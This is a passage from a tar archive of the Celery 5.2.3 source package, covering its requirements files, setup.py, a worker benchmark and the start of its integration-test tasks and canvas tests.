wheel>=0.33.1 flake8>=3.8.3 flakeplus>=1.1 flake8-docstrings~=1.5 pydocstyle~=5.0; python_version >= '3.0' tox>=3.8.4 sphinx2rst>=1.0 # Disable cyanide until it's fully updated. # cyanide>=1.0.1 bumpversion ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/security.txt0000664000175000017500000000002300000000000020023 0ustar00asifasif00000000000000-r extras/auth.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/test-ci-base.txt0000664000175000017500000000020100000000000020432 0ustar00asifasif00000000000000pytest-cov codecov -r extras/redis.txt -r extras/sqlalchemy.txt -r extras/pymemcache.txt -r extras/thread.txt -r extras/auth.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1636628346.0 celery-5.2.3/requirements/test-ci-default.txt0000664000175000017500000000104500000000000021153 0ustar00asifasif00000000000000-r test-ci-base.txt -r extras/auth.txt -r extras/solar.txt -r extras/mongodb.txt -r extras/yaml.txt -r extras/tblib.txt -r extras/slmq.txt -r extras/msgpack.txt -r extras/memcache.txt -r extras/eventlet.txt -r extras/gevent.txt -r extras/thread.txt -r extras/elasticsearch.txt -r extras/couchdb.txt -r extras/couchbase.txt -r extras/arangodb.txt -r extras/consul.txt -r extras/cosmosdbsql.txt -r extras/cassandra.txt -r extras/azureblockblob.txt # SQS dependencies other than boto pycurl==7.43.0.5 # Latest version with wheel built (for appveyor) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/test-integration.txt0000664000175000017500000000016500000000000021463 0ustar00asifasif00000000000000-r extras/redis.txt -r extras/azureblockblob.txt -r extras/auth.txt -r extras/memcache.txt pytest-rerunfailures>=6.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/test-pypy3.txt0000664000175000017500000000002100000000000020213 0ustar00asifasif00000000000000-r deps/mock.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/test.txt0000664000175000017500000000021700000000000017140 0ustar00asifasif00000000000000pytest~=6.2 pytest-celery pytest-subtests pytest-timeout~=1.4.2 boto3>=1.9.178 moto>=2.2.6 pre-commit -r extras/yaml.txt -r extras/msgpack.txt ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8677578 celery-5.2.3/setup.cfg0000664000175000017500000000155000000000000014517 0ustar00asifasif00000000000000[build_sphinx] source-dir = docs/ build-dir = docs/_build all_files = 1 [flake8] max-line-length = 117 extend-ignore = E203, # incompatible with black https://github.com/psf/black/issues/315#issuecomment-395457972 D102, # Missing docstring in public method D104, # Missing docstring in public package D105, # Missing docstring in magic method D107, # Missing docstring in __init__ D401, # First line should be in imperative mood; try rephrasing D412, # No blank lines allowed between a section header and its content E741, # ambiguous variable name '...' E742, # ambiguous class definition '...' per-file-ignores = t/*,setup.py,examples/*,docs/*,extra/*: D, [bdist_rpm] requires = pytz >= 2016.7 billiard >= 3.6.3.0,<4.0 kombu >= 5.2.1,<6.0.0 [bdist_wheel] universal = 0 [metadata] license_file = LICENSE [egg_info] tag_build = tag_date = 0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/setup.py0000775000175000017500000001174300000000000014420 0ustar00asifasif00000000000000#!/usr/bin/env python3 import codecs import os import re import sys import setuptools import setuptools.command.test NAME = 'celery' # -*- Extras -*- EXTENSIONS = { 'arangodb', 'auth', 'azureblockblob', 'brotli', 'cassandra', 'consul', 'cosmosdbsql', 'couchbase', 'couchdb', 'django', 'dynamodb', 'elasticsearch', 'eventlet', 'gevent', 'librabbitmq', 'memcache', 'mongodb', 'msgpack', 'pymemcache', 'pyro', 'pytest', 'redis', 's3', 'slmq', 'solar', 'sqlalchemy', 'sqs', 'tblib', 'yaml', 'zookeeper', 'zstd' } # -*- Distribution Meta -*- re_meta = re.compile(r'__(\w+?)__\s*=\s*(.*)') re_doc = re.compile(r'^"""(.+?)"""') def _add_default(m): attr_name, attr_value = m.groups() return ((attr_name, attr_value.strip("\"'")),) def _add_doc(m): return (('doc', m.groups()[0]),) def parse_dist_meta(): """Extract metadata information from ``$dist/__init__.py``.""" pats = {re_meta: _add_default, re_doc: _add_doc} here = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(here, NAME, '__init__.py')) as meta_fh: distmeta = {} for line in meta_fh: if line.strip() == '# -eof meta-': break for pattern, handler in pats.items(): m = pattern.match(line.strip()) if m: distmeta.update(handler(m)) return distmeta # -*- Requirements -*- def _strip_comments(l): return l.split('#', 1)[0].strip() def _pip_requirement(req): if req.startswith('-r '): _, path = req.split() return reqs(*path.split('/')) return [req] def _reqs(*f): return [ _pip_requirement(r) for r in ( _strip_comments(l) for l in open( os.path.join(os.getcwd(), 'requirements', *f)).readlines() ) if r] def reqs(*f): """Parse requirement file. Example: reqs('default.txt') # requirements/default.txt reqs('extras', 'redis.txt') # requirements/extras/redis.txt Returns: List[str]: list of requirements specified in the file. """ return [req for subreq in _reqs(*f) for req in subreq] def extras(*p): """Parse requirement in the requirements/extras/ directory.""" return reqs('extras', *p) def install_requires(): """Get list of requirements required for installation.""" return reqs('default.txt') def extras_require(): """Get map of all extra requirements.""" return {x: extras(x + '.txt') for x in EXTENSIONS} # -*- Long Description -*- def long_description(): try: return codecs.open('README.rst', 'r', 'utf-8').read() except OSError: return 'Long description error: Missing README.rst file' # -*- Command: setup.py test -*- class pytest(setuptools.command.test.test): user_options = [('pytest-args=', 'a', 'Arguments to pass to pytest')] def initialize_options(self): super().initialize_options() self.pytest_args = [] def run_tests(self): import pytest as _pytest sys.exit(_pytest.main(self.pytest_args)) # -*- %%% -*- meta = parse_dist_meta() setuptools.setup( name=NAME, packages=setuptools.find_packages(exclude=['t', 't.*']), version=meta['version'], description=meta['doc'], long_description=long_description(), keywords=meta['keywords'], author=meta['author'], author_email=meta['contact'], url=meta['homepage'], license='BSD', platforms=['any'], install_requires=install_requires(), python_requires=">=3.7,", tests_require=reqs('test.txt'), extras_require=extras_require(), cmdclass={'test': pytest}, include_package_data=True, zip_safe=False, entry_points={ 'console_scripts': [ 'celery = celery.__main__:main', ] }, project_urls={ "Documentation": "https://docs.celeryproject.org/en/latest/index.html", "Changelog": "https://docs.celeryproject.org/en/stable/changelog.html", "Code": "https://github.com/celery/celery", "Tracker": "https://github.com/celery/celery/issues", "Funding": "https://opencollective.com/celery" }, classifiers=[ "Development Status :: 5 - Production/Stable", "License :: OSI Approved :: BSD License", "Topic :: System :: Distributed Computing", "Topic :: Software Development :: Object Brokering", "Framework :: Celery", "Programming Language :: Python", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: Implementation :: CPython", "Programming Language :: Python :: Implementation :: PyPy", "Operating System :: OS Independent" ] ) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7477558 celery-5.2.3/t/0000775000175000017500000000000000000000000013140 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/__init__.py0000664000175000017500000000000000000000000015237 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7477558 celery-5.2.3/t/benchmarks/0000775000175000017500000000000000000000000015255 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/benchmarks/bench_worker.py0000664000175000017500000000537700000000000020313 0ustar00asifasif00000000000000import os import sys import time from celery import Celery os.environ.update( NOSETPS='yes', USE_FAST_LOCALS='yes', ) DEFAULT_ITS = 40000 BROKER_TRANSPORT = os.environ.get('BROKER', 'librabbitmq://') if hasattr(sys, 'pypy_version_info'): BROKER_TRANSPORT = 'pyamqp://' app = Celery('bench_worker') app.conf.update( broker_url=BROKER_TRANSPORT, broker_pool_limit=10, worker_pool='solo', worker_prefetch_multiplier=0, task_default_delivery_mode=1, task_queues={ 'bench.worker': { 'exchange': 'bench.worker', 'routing_key': 'bench.worker', 'no_ack': True, 'exchange_durable': False, 'queue_durable': False, 'auto_delete': True, } }, task_serializer='json', task_default_queue='bench.worker', result_backend=None, ), def tdiff(then): return time.monotonic() - then @app.task(cur=0, time_start=None, queue='bench.worker', bare=True) def it(_, n): # use internal counter, as ordering can be skewed # by previous runs, or the broker. i = it.cur if i and not i % 5000: print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr) it.subt = time.monotonic() if not i: it.subt = it.time_start = time.monotonic() elif i > n - 2: total = tdiff(it.time_start) print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr) print('-- process {} tasks: {}s total, {} tasks/s'.format( n, total, n / (total + .0), )) import os os._exit() it.cur += 1 def bench_apply(n=DEFAULT_ITS): time_start = time.monotonic() task = it._get_current_object() with app.producer_or_acquire() as producer: [task.apply_async((i, n), producer=producer) for i in range(n)] print(f'-- apply {n} tasks: {time.monotonic() - time_start}s') def bench_work(n=DEFAULT_ITS, loglevel='CRITICAL'): loglevel = os.environ.get('BENCH_LOGLEVEL') or loglevel if loglevel: app.log.setup_logging_subsystem(loglevel=loglevel) worker = app.WorkController(concurrency=15, queues=['bench.worker']) try: print('-- starting worker') worker.start() except SystemExit: raise assert sum(worker.state.total_count.values()) == n + 1 def bench_both(n=DEFAULT_ITS): bench_apply(n) bench_work(n) def main(argv=sys.argv): n = DEFAULT_ITS if len(argv) < 2: print(f'Usage: {os.path.basename(argv[0])} [apply|work|both] [n=20k]') return sys.exit(1) try: n = int(argv[2]) except IndexError: pass return {'apply': bench_apply, 'work': bench_work, 'both': bench_both}[argv[1]](n=n) if __name__ == '__main__': main() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7597558 celery-5.2.3/t/integration/0000775000175000017500000000000000000000000015463 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/__init__.py0000664000175000017500000000000000000000000017562 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/conftest.py0000664000175000017500000000351700000000000017670 0ustar00asifasif00000000000000import os import pytest # we have to import the pytest plugin fixtures here, # in case user did not do the `python setup.py develop` yet, # that installs the pytest plugin into the setuptools registry. from celery.contrib.pytest import celery_app, celery_session_worker from celery.contrib.testing.manager import Manager TEST_BROKER = os.environ.get('TEST_BROKER', 'pyamqp://') TEST_BACKEND = os.environ.get('TEST_BACKEND', 'redis://') # Tricks flake8 into silencing redefining fixtures warnings. __all__ = ( 'celery_app', 'celery_session_worker', 'get_active_redis_channels', 'get_redis_connection', ) def get_redis_connection(): from redis import StrictRedis return StrictRedis(host=os.environ.get('REDIS_HOST')) def get_active_redis_channels(): return get_redis_connection().execute_command('PUBSUB CHANNELS') @pytest.fixture(scope='session') def celery_config(): return { 'broker_url': TEST_BROKER, 'result_backend': TEST_BACKEND, 'cassandra_servers': ['localhost'], 'cassandra_keyspace': 'tests', 'cassandra_table': 'tests', 'cassandra_read_consistency': 'ONE', 'cassandra_write_consistency': 'ONE' } @pytest.fixture(scope='session') def celery_enable_logging(): return True @pytest.fixture(scope='session') def celery_worker_pool(): return 'prefork' @pytest.fixture(scope='session') def celery_includes(): return {'t.integration.tasks'} @pytest.fixture def app(celery_app): yield celery_app @pytest.fixture def manager(app, celery_session_worker): return Manager(app) @pytest.fixture(autouse=True) def ZZZZ_set_app_current(app): app.set_current() app.set_default() @pytest.fixture(scope='session') def celery_class_tasks(): from t.integration.tasks import ClassBasedAutoRetryTask return [ClassBasedAutoRetryTask] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/tasks.py0000664000175000017500000002340600000000000017167 0ustar00asifasif00000000000000from time import sleep from celery import Signature, Task, chain, chord, group, shared_task from celery.exceptions import SoftTimeLimitExceeded from celery.utils.log import get_task_logger from .conftest import get_redis_connection logger = get_task_logger(__name__) @shared_task def identity(x): """Return the argument.""" return x @shared_task def add(x, y, z=None): """Add two or three numbers.""" if z: return x + y + z else: return x + y @shared_task def write_to_file_and_return_int(file_name, i): with open(file_name, mode='a', buffering=1) as file_handle: file_handle.write(str(i)+'\n') return i @shared_task(typing=False) def add_not_typed(x, y): """Add two numbers, but don't check arguments""" return x + y @shared_task(ignore_result=True) def add_ignore_result(x, y): """Add two numbers.""" return x + y @shared_task def raise_error(*args): """Deliberately raise an error.""" raise ValueError("deliberate error") @shared_task def chain_add(x, y): ( add.s(x, x) | add.s(y) ).apply_async() @shared_task def chord_add(x, y): chord(add.s(x, x), add.s(y)).apply_async() @shared_task def delayed_sum(numbers, pause_time=1): """Sum the iterable of numbers.""" # Allow the task to be in STARTED state for # a limited period of time. sleep(pause_time) return sum(numbers) @shared_task def delayed_sum_with_soft_guard(numbers, pause_time=1): """Sum the iterable of numbers.""" try: sleep(pause_time) return sum(numbers) except SoftTimeLimitExceeded: return 0 @shared_task def tsum(nums): """Sum an iterable of numbers.""" return sum(nums) @shared_task(bind=True) def add_replaced(self, x, y): """Add two numbers (via the add task).""" raise self.replace(add.s(x, y)) @shared_task(bind=True) def replace_with_chain(self, *args, link_msg=None): c = chain(identity.s(*args), identity.s()) link_sig = redis_echo.s() if link_msg is not None: link_sig.args = (link_msg,) link_sig.set(immutable=True) c.link(link_sig) return self.replace(c) @shared_task(bind=True) def replace_with_chain_which_raises(self, *args, link_msg=None): c = chain(identity.s(*args), raise_error.s()) link_sig = redis_echo.s() if link_msg is not None: link_sig.args = (link_msg,) link_sig.set(immutable=True) c.link_error(link_sig) return self.replace(c) @shared_task(bind=True) def replace_with_empty_chain(self, *_): return self.replace(chain()) @shared_task(bind=True) def add_to_all(self, nums, val): """Add the given value to all supplied numbers.""" subtasks = [add.s(num, val) for num in nums] raise self.replace(group(*subtasks)) @shared_task(bind=True) def add_to_all_to_chord(self, nums, val): for num in nums: self.add_to_chord(add.s(num, val)) return 0 @shared_task(bind=True) def add_chord_to_chord(self, nums, val): subtasks = [add.s(num, val) for num in nums] self.add_to_chord(group(subtasks) | tsum.s()) return 0 @shared_task def print_unicode(log_message='hå它 valmuefrø', print_message='hiöäüß'): """Task that both logs and print strings containing funny characters.""" logger.warning(log_message) print(print_message) @shared_task def return_exception(e): """Return a tuple containing the exception message and sentinel value.""" return e, True @shared_task def sleeping(i, **_): """Task sleeping for ``i`` seconds, and returning nothing.""" sleep(i) @shared_task(bind=True) def ids(self, i): """Returns a tuple of ``root_id``, ``parent_id`` and the argument passed as ``i``.""" return self.request.root_id, self.request.parent_id, i @shared_task(bind=True) def collect_ids(self, res, i): """Used as a callback in a chain or group where the previous tasks are :task:`ids`: returns a tuple of:: (previous_result, (root_id, parent_id, i)) """ return res, (self.request.root_id, self.request.parent_id, i) @shared_task(bind=True, default_retry_delay=1) def retry(self, return_value=None): """Task simulating multiple retries. When return_value is provided, the task after retries returns the result. Otherwise it fails. """ if return_value: attempt = getattr(self, 'attempt', 0) print('attempt', attempt) if attempt >= 3: delattr(self, 'attempt') return return_value self.attempt = attempt + 1 raise self.retry(exc=ExpectedException(), countdown=5) @shared_task(bind=True, expires=60.0, max_retries=1) def retry_once(self, *args, expires=60.0, max_retries=1, countdown=0.1): """Task that fails and is retried. Returns the number of retries.""" if self.request.retries: return self.request.retries raise self.retry(countdown=countdown, max_retries=max_retries) @shared_task(bind=True, expires=60.0, max_retries=1) def retry_once_priority(self, *args, expires=60.0, max_retries=1, countdown=0.1): """Task that fails and is retried. Returns the priority.""" if self.request.retries: return self.request.delivery_info['priority'] raise self.retry(countdown=countdown, max_retries=max_retries) @shared_task def redis_echo(message, redis_key="redis-echo"): """Task that appends the message to a redis list.""" redis_connection = get_redis_connection() redis_connection.rpush(redis_key, message) @shared_task def redis_count(redis_key="redis-count"): """Task that increments a specified or well-known redis key.""" redis_connection = get_redis_connection() redis_connection.incr(redis_key) @shared_task(bind=True) def second_order_replace1(self, state=False): redis_connection = get_redis_connection() if not state: redis_connection.rpush('redis-echo', 'In A') new_task = chain(second_order_replace2.s(), second_order_replace1.si(state=True)) raise self.replace(new_task) else: redis_connection.rpush('redis-echo', 'Out A') @shared_task(bind=True) def second_order_replace2(self, state=False): redis_connection = get_redis_connection() if not state: redis_connection.rpush('redis-echo', 'In B') new_task = chain(redis_echo.s("In/Out C"), second_order_replace2.si(state=True)) raise self.replace(new_task) else: redis_connection.rpush('redis-echo', 'Out B') @shared_task(bind=True) def build_chain_inside_task(self): """Task to build a chain. This task builds a chain and returns the chain's AsyncResult to verify that Asyncresults are correctly converted into serializable objects""" test_chain = ( add.s(1, 1) | add.s(2) | group( add.s(3), add.s(4) ) | add.s(5) ) result = test_chain() return result class ExpectedException(Exception): """Sentinel exception for tests.""" def __eq__(self, other): return ( other is not None and isinstance(other, ExpectedException) and self.args == other.args ) def __hash__(self): return hash(self.args) @shared_task def fail(*args): """Task that simply raises ExpectedException.""" args = ("Task expected to fail",) + args raise ExpectedException(*args) @shared_task(bind=True) def fail_replaced(self, *args): """Replace this task with one which raises ExpectedException.""" raise self.replace(fail.si(*args)) @shared_task(bind=True) def return_priority(self, *_args): return "Priority: %s" % self.request.delivery_info['priority'] @shared_task(bind=True) def return_properties(self): return self.request.properties class ClassBasedAutoRetryTask(Task): name = 'auto_retry_class_task' autoretry_for = (ValueError,) retry_kwargs = {'max_retries': 1} retry_backoff = True def run(self): if self.request.retries: return self.request.retries raise ValueError() # The signatures returned by these tasks wouldn't actually run because the # arguments wouldn't be fulfilled - we never actually delay them so it's fine @shared_task def return_nested_signature_chain_chain(): return chain(chain([add.s()])) @shared_task def return_nested_signature_chain_group(): return chain(group([add.s()])) @shared_task def return_nested_signature_chain_chord(): return chain(chord([add.s()], add.s())) @shared_task def return_nested_signature_group_chain(): return group(chain([add.s()])) @shared_task def return_nested_signature_group_group(): return group(group([add.s()])) @shared_task def return_nested_signature_group_chord(): return group(chord([add.s()], add.s())) @shared_task def return_nested_signature_chord_chain(): return chord(chain([add.s()]), add.s()) @shared_task def return_nested_signature_chord_group(): return chord(group([add.s()]), add.s()) @shared_task def return_nested_signature_chord_chord(): return chord(chord([add.s()], add.s()), add.s()) @shared_task def rebuild_signature(sig_dict): sig_obj = Signature.from_dict(sig_dict) def _recurse(sig): if not isinstance(sig, Signature): raise TypeError(f"{sig!r} is not a signature object") # Most canvas types have a `tasks` attribute if isinstance(sig, (chain, group, chord)): for task in sig.tasks: _recurse(task) # `chord`s also have a `body` attribute if isinstance(sig, chord): _recurse(sig.body) _recurse(sig_obj) @shared_task def errback_old_style(request_id): redis_count(request_id) return request_id @shared_task def errback_new_style(request, exc, tb): redis_count(request.id) return request.id ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/test_backend.py0000664000175000017500000000214000000000000020460 0ustar00asifasif00000000000000import os import pytest from celery import states from celery.backends.azureblockblob import AzureBlockBlobBackend pytest.importorskip('azure') @pytest.mark.skipif( not os.environ.get('AZUREBLOCKBLOB_URL'), reason='Environment variable AZUREBLOCKBLOB_URL required' ) class test_AzureBlockBlobBackend: def test_crud(self, manager): backend = AzureBlockBlobBackend( app=manager.app, url=os.environ["AZUREBLOCKBLOB_URL"]) key_values = {("akey%d" % i).encode(): "avalue%d" % i for i in range(5)} for key, value in key_values.items(): backend._set_with_state(key, value, states.SUCCESS) actual_values = backend.mget(key_values.keys()) expected_values = list(key_values.values()) assert expected_values == actual_values for key in key_values: backend.delete(key) def test_get_missing(self, manager): backend = AzureBlockBlobBackend( app=manager.app, url=os.environ["AZUREBLOCKBLOB_URL"]) assert backend.get(b"doesNotExist") is None ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/test_canvas.py0000664000175000017500000026536600000000000020371 0ustar00asifasif00000000000000import collections import re import tempfile import uuid from datetime import datetime, timedelta from time import monotonic, sleep import pytest import pytest_subtests # noqa: F401 from celery import chain, chord, group, signature from celery.backends.base import BaseKeyValueStoreBackend from celery.exceptions import ImproperlyConfigured, TimeoutError from celery.result import AsyncResult, GroupResult, ResultSet from . import tasks from .conftest import (TEST_BACKEND, get_active_redis_channels, get_redis_connection) from .tasks import (ExpectedException, add, add_chord_to_chord, add_replaced, add_to_all, add_to_all_to_chord, build_chain_inside_task, collect_ids, delayed_sum, delayed_sum_with_soft_guard, errback_new_style, errback_old_style, fail, fail_replaced, identity, ids, print_unicode, raise_error, redis_count, redis_echo, replace_with_chain, replace_with_chain_which_raises, replace_with_empty_chain, retry_once, return_exception, return_priority, second_order_replace1, tsum, write_to_file_and_return_int) RETRYABLE_EXCEPTIONS = (OSError, ConnectionError, TimeoutError) def is_retryable_exception(exc): return isinstance(exc, RETRYABLE_EXCEPTIONS) TIMEOUT = 60 _flaky = pytest.mark.flaky(reruns=5, reruns_delay=1, cause=is_retryable_exception) _timeout = pytest.mark.timeout(timeout=300) def flaky(fn): return _timeout(_flaky(fn)) def await_redis_echo(expected_msgs, redis_key="redis-echo", timeout=TIMEOUT): """ Helper to wait for a specified or well-known redis key to contain a string. """ redis_connection = get_redis_connection() if isinstance(expected_msgs, (str, bytes, bytearray)): expected_msgs = (expected_msgs, ) expected_msgs = collections.Counter( e if not isinstance(e, str) else e.encode("utf-8") for e in expected_msgs ) # This can technically wait for `len(expected_msg_or_msgs) * timeout` :/ while +expected_msgs: maybe_key_msg = redis_connection.blpop(redis_key, timeout) if maybe_key_msg is None: raise TimeoutError( "Fetching from {!r} timed out - still awaiting {!r}" .format(redis_key, dict(+expected_msgs)) ) retrieved_key, msg = maybe_key_msg assert retrieved_key.decode("utf-8") == redis_key expected_msgs[msg] -= 1 # silently accepts unexpected messages # There should be no more elements - block momentarily assert redis_connection.blpop(redis_key, min(1, timeout)) is None def await_redis_count(expected_count, redis_key="redis-count", timeout=TIMEOUT): """ Helper to wait for a specified or well-known redis key to count to a value. """ redis_connection = get_redis_connection() check_interval = 0.1 check_max = int(timeout / check_interval) for i in range(check_max + 1): maybe_count = redis_connection.get(redis_key) # It's either `None` or a base-10 integer if maybe_count is not None: count = int(maybe_count) if count == expected_count: break elif i >= check_max: assert count == expected_count # try again later sleep(check_interval) else: raise TimeoutError(f"{redis_key!r} was never incremented") # There should be no more increments - block momentarily sleep(min(1, timeout)) assert int(redis_connection.get(redis_key)) == expected_count class test_link_error: @flaky def test_link_error_eager(self): exception = ExpectedException("Task expected to fail", "test") result = fail.apply(args=("test",), link_error=return_exception.s()) actual = result.get(timeout=TIMEOUT, propagate=False) assert actual == exception @flaky def test_link_error(self): exception = ExpectedException("Task expected to fail", "test") result = fail.apply(args=("test",), link_error=return_exception.s()) actual = result.get(timeout=TIMEOUT, propagate=False) assert actual == exception @flaky def test_link_error_callback_error_callback_retries_eager(self): exception = ExpectedException("Task expected to fail", "test") result = fail.apply( args=("test",), link_error=retry_once.s(countdown=None) ) assert result.get(timeout=TIMEOUT, propagate=False) == exception @flaky def test_link_error_callback_retries(self): exception = ExpectedException("Task expected to fail", "test") result = fail.apply_async( args=("test",), link_error=retry_once.s(countdown=None) ) assert result.get(timeout=TIMEOUT, propagate=False) == exception @flaky def test_link_error_using_signature_eager(self): fail = signature('t.integration.tasks.fail', args=("test",)) retrun_exception = signature('t.integration.tasks.return_exception') fail.link_error(retrun_exception) exception = ExpectedException("Task expected to fail", "test") assert (fail.apply().get(timeout=TIMEOUT, propagate=False), True) == ( exception, True) @flaky def test_link_error_using_signature(self): fail = signature('t.integration.tasks.fail', args=("test",)) retrun_exception = signature('t.integration.tasks.return_exception') fail.link_error(retrun_exception) exception = ExpectedException("Task expected to fail", "test") assert (fail.delay().get(timeout=TIMEOUT, propagate=False), True) == ( exception, True) class test_chain: @flaky def test_simple_chain(self, manager): c = add.s(4, 4) | add.s(8) | add.s(16) assert c().get(timeout=TIMEOUT) == 32 @flaky def test_single_chain(self, manager): c = chain(add.s(3, 4))() assert c.get(timeout=TIMEOUT) == 7 @flaky def test_complex_chain(self, manager): c = ( add.s(2, 2) | ( add.s(4) | add_replaced.s(8) | add.s(16) | add.s(32) ) | group(add.s(i) for i in range(4)) ) res = c() assert res.get(timeout=TIMEOUT) == [64, 65, 66, 67] @flaky def test_group_results_in_chain(self, manager): # This adds in an explicit test for the special case added in commit # 1e3fcaa969de6ad32b52a3ed8e74281e5e5360e6 c = ( group( add.s(1, 2) | group( add.s(1), add.s(2) ) ) ) res = c() assert res.get(timeout=TIMEOUT) == [4, 5] def test_chain_of_chain_with_a_single_task(self, manager): sig = signature('any_taskname', queue='any_q') chain([chain(sig)]).apply_async() def test_chain_on_error(self, manager): from .tasks import ExpectedException if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') # Run the chord and wait for the error callback to finish. c1 = chain( add.s(1, 2), fail.s(), add.s(3, 4), ) res = c1() with pytest.raises(ExpectedException): res.get(propagate=True) with pytest.raises(ExpectedException): res.parent.get(propagate=True) @flaky def test_chain_inside_group_receives_arguments(self, manager): c = ( add.s(5, 6) | group((add.s(1) | add.s(2), add.s(3))) ) res = c() assert res.get(timeout=TIMEOUT) == [14, 14] @flaky def test_eager_chain_inside_task(self, manager): from .tasks import chain_add prev = chain_add.app.conf.task_always_eager chain_add.app.conf.task_always_eager = True chain_add.apply_async(args=(4, 8), throw=True).get() chain_add.app.conf.task_always_eager = prev @flaky def test_group_chord_group_chain(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') before = group(redis_echo.si(f'before {i}') for i in range(3)) connect = redis_echo.si('connect') after = group(redis_echo.si(f'after {i}') for i in range(2)) result = (before | connect | after).delay() result.get(timeout=TIMEOUT) redis_messages = list(redis_connection.lrange('redis-echo', 0, -1)) before_items = {b'before 0', b'before 1', b'before 2'} after_items = {b'after 0', b'after 1'} assert set(redis_messages[:3]) == before_items assert redis_messages[3] == b'connect' assert set(redis_messages[4:]) == after_items redis_connection.delete('redis-echo') @flaky def test_group_result_not_has_cache(self, manager): t1 = identity.si(1) t2 = identity.si(2) gt = group([identity.si(3), identity.si(4)]) ct = chain(identity.si(5), gt) task = group(t1, t2, ct) result = task.delay() assert result.get(timeout=TIMEOUT) == [1, 2, [3, 4]] @flaky def test_second_order_replace(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') result = second_order_replace1.delay() result.get(timeout=TIMEOUT) redis_messages = list(redis_connection.lrange('redis-echo', 0, -1)) expected_messages = [b'In A', b'In B', b'In/Out C', b'Out B', b'Out A'] assert redis_messages == expected_messages @flaky def test_parent_ids(self, manager, num=10): assert_ping(manager) c = chain(ids.si(i=i) for i in range(num)) c.freeze() res = c() try: res.get(timeout=TIMEOUT) except TimeoutError: print(manager.inspect().active()) print(manager.inspect().reserved()) print(manager.inspect().stats()) raise self.assert_ids(res, num - 1) def assert_ids(self, res, size): i, root = size, res while root.parent: root = root.parent node = res while node: root_id, parent_id, value = node.get(timeout=30) assert value == i if node.parent: assert parent_id == node.parent.id assert root_id == root.id node = node.parent i -= 1 def test_chord_soft_timeout_recuperation(self, manager): """Test that if soft timeout happens in task but is managed by task, chord still get results normally """ if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') c = chord([ # return 3 add.s(1, 2), # return 0 after managing soft timeout delayed_sum_with_soft_guard.s( [100], pause_time=2 ).set( soft_time_limit=1 ), ]) result = c(delayed_sum.s(pause_time=0)).get() assert result == 3 def test_chain_error_handler_with_eta(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) eta = datetime.utcnow() + timedelta(seconds=10) c = chain( group( add.s(1, 2), add.s(3, 4), ), tsum.s() ).on_error(print_unicode.s()).apply_async(eta=eta) result = c.get() assert result == 10 @flaky def test_groupresult_serialization(self, manager): """Test GroupResult is correctly serialized to save in the result backend""" try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) async_result = build_chain_inside_task.delay() result = async_result.get() assert len(result) == 2 assert isinstance(result[0][1], list) @flaky def test_chain_of_task_a_group_and_a_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = add.si(1, 0) c = c | group(add.s(1), add.s(1)) c = c | group(tsum.s(), tsum.s()) c = c | tsum.s() res = c() assert res.get(timeout=TIMEOUT) == 8 @flaky def test_chain_of_chords_as_groups_chained_to_a_task_with_two_tasks(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = add.si(1, 0) c = c | group(add.s(1), add.s(1)) c = c | tsum.s() c = c | add.s(1) c = c | group(add.s(1), add.s(1)) c = c | tsum.s() res = c() assert res.get(timeout=TIMEOUT) == 12 @flaky def test_chain_of_chords_with_two_tasks(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = add.si(1, 0) c = c | group(add.s(1), add.s(1)) c = c | tsum.s() c = c | 